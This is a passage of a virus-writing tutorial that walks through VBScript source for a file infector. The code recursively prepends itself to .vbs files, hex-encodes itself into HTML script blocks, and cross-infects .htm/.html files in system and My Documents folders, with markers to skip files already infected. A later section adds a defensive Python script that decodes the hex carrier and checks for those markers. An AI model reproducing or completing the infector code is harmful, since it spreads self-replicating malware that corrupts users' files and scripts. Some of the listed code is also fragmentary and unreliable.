Sub list(doss)
  On Error Resume Next
  Set fso = CreateObject("Scripting.FileSystemObject")
  Set fold = fso.GetFolder(doss)                          ' Get the folder
  Set yebjp = fold.SubFolders
  For Each f1 In yebjp
    infect(f1.Path)
    list(f1.Path)
  Next
End Sub

Sub infect(doss)
  On Error Resume Next
  Set zqhanx = CreateObject("Scripting.FileSystemObject")
  Set lxxj = zqhanx.GetFolder(doss)
  Set fc = lxxj.Files                                     ' Get the files
  For Each f1 In fc
    ext = fso.GetExtensionName(f1.Path)
    ext = lCase(ext)
    If (ext = "vbs") Then
      Set cot = fso.OpenTextFile(f1.Path, 1, False)
      If cot.ReadLine <> "'mark" Then                     ' check if already infected
        cot.Close
        Set cot = fso.OpenTextFile(f1.Path, 1, False)
        vbsorg = cot.ReadAll()
        cot.Close
        Set inf = fso.OpenTextFile(f1.Path, 2, True)
        inf.WriteLine virus                               ' write virus code
        inf.WriteLine ""
        inf.WriteLine (vbsorg)                            ' write real code
        inf.Close
      End If
    End If
  Next
End Sub

###################
# II: VBS -> HTML #
###################

So, the idea is to put the viral code into the VBS file. How ?? By converting it into a hex string :

....
....
If (ext = "htm") or (ext = "html") Then
  Set cot = fso.OpenTextFile(f1.Path, 1, False)
  If InStr(1,cot.ReadAll(),"vbshex") = 0 Then             ' check if already infected
    cot.Close
    Set htmf = fso.OpenTextFile(f1.Path, 8, False)
    htmf.WriteLine "<SCRIPT LANGUAGE=VBSCRIPT>"
    f = "vbshex="""
    For i = 1 to Len(virus)
      e=Mid(virus,i,1)                                    ' take all chars
      e=Hex(Asc(e))                                       ' and convert to hex
      If Len(e)=1 Then
        e="0"&e                                           ' DA -> 0D0A for VbCrLf
      End If
      f=f+e
    Next
    f=f+""""
    htmf.WriteLine f
    ...... NO FINISH, SEE THE fourth chapter              ' Here the infection HTML -> VBS
    htmf.Close
  End If
End If

Set htmf = fso.CreateTextFile("hello.htm",8,-2)
htmf.WriteLine "<SCRIPT LANGUAGE=VBSCRIPT>"
f = "vbshex="""
For i = 1 to Len(virus)
  e=Mid(virus,i,1)                                        ' take all chars
  e=Hex(Asc(e))                                           ' and convert to hex
  If Len(e)=1 Then
    e="0"&e                                               ' DA -> 0D0A for VbCrLf
  End If
  f=f+e
Next
f=f+""""
htmf.WriteLine f
htmf.Close

#####################
# III: HTML -> HTML #
#####################

It's a simple routine. Like in VBS (and it's in VBS). This is a part of the source :

<mark>                                                    ' the mark
<html><head><title>You're title</title></head><body>
<script language=VBScript>
On Error Resume Next
Set fso=CreateObject("Scripting.FileSystemObject")
Set ws=CreateObject("WScript.Shell")
If err.number=429 Then                                    ' err number if user clicks NO
  ws.Run javascript:location.reload()
Else
  infhtm(uplobu.GetSpecialFolder(0))                      ' call the infhtm function
  infhtm(uplobu.GetSpecialFolder(1))                      ' in specific folders (better)
  infhtm(unlgeu.SpecialFolders("MyDocuments"))
End If
Function infhtm(dir)
  If fso.FolderExists(dir) Then
    Set ibamih=fso.GetFolder(dir)
    Set vtob=ibamih.Files
    For each f1 in vtob
      ext=lcase(uplobu.GetExtensionName(f1.Name))
      If ext="htm" or ext="html" Then                     ' check extension
        Set eqybwx=fso.OpenTextFile(djra.path, 1, False)
        If eqybwx.ReadLine <> "<mark>" Then               ' already infected ??
          eqybwx.Close()
          Set eqybwx=fso.OpenTextFile(djra.path, 1, False)
          htmorg=eqybwx.ReadAll()
          eqybwx.Close()
          Set virushtm=document.body.CreateTextRange
          Set eqybwx=fso.CreateTextFile(djra.path, True, False)
          eqybwx.WriteLine "<mark>"                       ' put the mark
          eqybwx.Write(htmorg)                            ' put the real code
          eqybwx.WriteLine virushtm.htmltext              ' put the htm virus
          eqybwx.Close()
        Else
          eqybwx.Close()
        End If
      End If
    Next
  End If
End Function
</script></body></html>

Really simple, no ??

###################
# IV: HTML -> VBS #
###################

So this is the last part. Look at the second part, where I wrote :

    ...... NO FINISH, SEE THE fourth chapter              ' Here the infection HTML -> VBS

Here we must search for the VBS files, the same way that we infect HTM/HTML files. In the HTML virus we have :

If ext="htm" or ext="html" Then

So we add :

ElseIf ext="vbs" Then
  Set cot = fso.OpenTextFile(f1.Path, 1, False)
  If cot.ReadLine <> "'mark" Then                         ' check if already infected
    cot.Close
    Set cot = fso.OpenTextFile(f1.Path, 1, False)
    vbsorg = cot.ReadAll()
    cot.Close
    ----------- here we infect the VBS file -----------
    For Y=1 To Len(vbshex) Step 2
      virvbs = virvbs & Chr("&H" & Mid(vbshex,Y,2))
    Next
    Set inf = fso.OpenTextFile(f1.Path, 2, True)
    inf.Write virvbs                                      ' write virus code
    inf.WriteLine ""
    inf.WriteLine (vbsorg)                                ' write real code
    inf.Close
    ----------- here we infect the VBS file -----------
End If
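From the defender's side, the carrier format described in chapters II and IV (a VBScript block whose vbshex="..." string holds the payload as zero-padded uppercase hex pairs) and the first-line markers of chapters I and III ('mark and <mark>) are exactly what a triage script can look for. The following is an added example, not code from the article: it decodes the hex string the way the chapter IV loop does and reports the markers; the sample HTML is constructed inline, and the function names are mine.

```python
import re

# Carrier described in chapter II: vbshex="..." with one hex pair per payload byte.
VBSHEX_RE = re.compile(r'vbshex\s*=\s*"([0-9A-Fa-f]*)"')
VBS_MARK = "'mark"      # first-line marker of the VBS parasite (chapter I)
HTML_MARK = "<mark>"    # first-line marker of the HTML parasite (chapter III)


def decode_vbshex(hexstr: str) -> str:
    """Reverse the chapter II encoding: Hex(Asc(ch)) padded to two digits.

    Mirrors the chapter IV loop Chr("&H" & Mid(vbshex, Y, 2)). An odd-length
    string means the carrier was truncated, so it is reported, not guessed at.
    """
    if len(hexstr) % 2:
        raise ValueError("odd-length vbshex string: truncated carrier")
    return bytes.fromhex(hexstr).decode("latin-1")


def triage_html(html: str) -> dict:
    """Check an HTML document against the markers and carrier the article uses."""
    lines = html.splitlines()
    first = lines[0].strip() if lines else ""
    payloads = [decode_vbshex(h) for h in VBSHEX_RE.findall(html)]
    return {
        "html_parasite_mark": first == HTML_MARK,
        "vbs_dropper_blocks": len(payloads),
        "payload_is_marked_vbs": any(p.startswith(VBS_MARK) for p in payloads),
        "payload_first_lines": [p.splitlines()[0] if p else "" for p in payloads],
    }


def make_sample() -> str:
    """Constructed test fixture (not a real infected file): a harmless two-line
    script encoded as uppercase hex pairs inside a VBScript block."""
    payload = "'mark\r\nOn Error Resume Next\r\n"
    hexstr = payload.encode("latin-1").hex().upper()
    return ("<html><head><title>page</title></head><body>\n"
            "<SCRIPT LANGUAGE=VBSCRIPT>\n"
            f'vbshex="{hexstr}"\n'
            "</SCRIPT></body></html>\n")


if __name__ == "__main__":
    print(triage_html(make_sample()))
```

Run over a directory of .htm/.html files, the "payload_first_lines" field lets an analyst see what each carrier would write into a VBS file without executing anything.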

###################
# V: CONCLUSION : #
###################

This is the end of the article. If you have some suggestions or new ideas, please mail me to petikvx@aol.fr.

PetiK/[b8] (www.petikvx.fr.fm)
